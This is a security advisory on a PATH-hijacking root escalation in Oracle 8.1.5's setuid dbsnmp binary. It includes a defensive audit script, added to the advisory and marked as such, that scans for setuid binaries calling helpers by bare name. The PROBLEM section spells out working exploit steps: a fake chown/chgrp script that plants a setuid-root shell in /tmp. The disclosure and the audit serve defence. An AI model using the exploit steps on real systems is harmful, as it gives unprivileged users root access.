COMMAND
dbsnmp
SYSTEMS AFFECTED
Oracle 8.1.5 (Only tested in Digital Unix)
PROBLEM
Ismael Briones found the following. There is a problem in dbsnmp that
can be used by local users to obtain root privileges. The dbsnmp
binary is setuid root. When a user executes dbsnmp, it calls
chown and chgrp without specifying their full path, so any user can
set his PATH variable to exploit this vulnerability. Any user
with local access can gain root privileges. Exploit:
- export PATH=~/bin/:$PATH
- Then we create the file ~/bin/chown or ~/bin/chgrp:
#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX
(We have to put it all on the same line, separated by a semicolon)
We make our chown or chgrp executable:
chmod +x ~/bin/chown
chmod +x ~/bin/chgrp
When the user executes dbsnmp, the system looks for chown in the
first directory of the PATH variable, executes our chown file and
we have a setuid-root shell in /tmp/XXX.
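The weakness above is a setuid-root program resolving helper commands through the caller's PATH. The following audit helper is an added example, not part of the original advisory: it scans setuid-root binaries for embedded command strings that name chown, chgrp and similar helpers without an absolute path (the command list is an assumption; extend it as needed).

```shell
#!/bin/sh
# Added audit helper, not part of the original advisory. It looks for the
# pattern behind the dbsnmp bug: a setuid-root binary that invokes helper
# commands (chown, chgrp, ...) by bare name, so the lookup goes through the
# caller's PATH. The command list is an assumption; extend it as needed.
SUSPECT_CMDS="chown chgrp chmod cp mv rm sh"

# check_binary FILE
#   Prints one line per bare-name reference found and returns 0 if any were
#   found, 1 otherwise. Printable runs are extracted with tr(1) rather than
#   strings(1) so the script has no binutils dependency.
check_binary() {
    file="$1"
    hits=0
    for cmd in $SUSPECT_CMDS; do
        # Require a trailing space (an argument list): a bare "chown" string
        # is usually just the libc symbol name and would be a false positive.
        if tr -c '[:print:]' '\n' < "$file" | grep -Eq "^${cmd} "; then
            echo "$file: invokes '$cmd' without an absolute path"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -gt 0 ]
}

# audit_setuid_root DIR
#   Runs check_binary over every setuid-root regular file under DIR.
#   Hits are candidates for manual review (tracing, disassembly), not proof.
audit_setuid_root() {
    find "$1" -xdev -type f -perm -4000 -user root 2>/dev/null |
    while read -r f; do
        check_binary "$f"
    done
}

# Usage: audit_setuid_root /
```

A hit only shows that the string is present; confirm by tracing the program's exec calls before treating it as a finding.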
The Oracle docs go on to say that to check whether or not the
dbsnmp agent is running, log in as oracle on the appropriate
server and run the following:
$ <path to oracle bin>/lsnrctl
LSNRCTL for Solaris: Version 8.1.5.0.0 - Production on 01-AUG-01 15:46:30
(c) Copyright 1998 Oracle Corporation. All rights reserved.
Welcome to LSNRCTL, type "help" for information.
LSNRCTL> dbsnmp_status
The db subagent is not started.
SOLUTION
Oracle 8.1.6 is not vulnerable. The vendor was contacted on 30/07/2001
and Oracle answered: "We are investigating a fix as we speak."
It's funny to see Oracle's canned response to this. Not 100% sure
this is exactly the same problem, but Aaron C. Newman worked with
them fixing what looks like the same problem back in 1999. They
provided a patch way back then; it might be that whoever responded
to you is not "up to speed":
http://oliver.efri.hr/~crv/security/bugs/Others/oracle7.html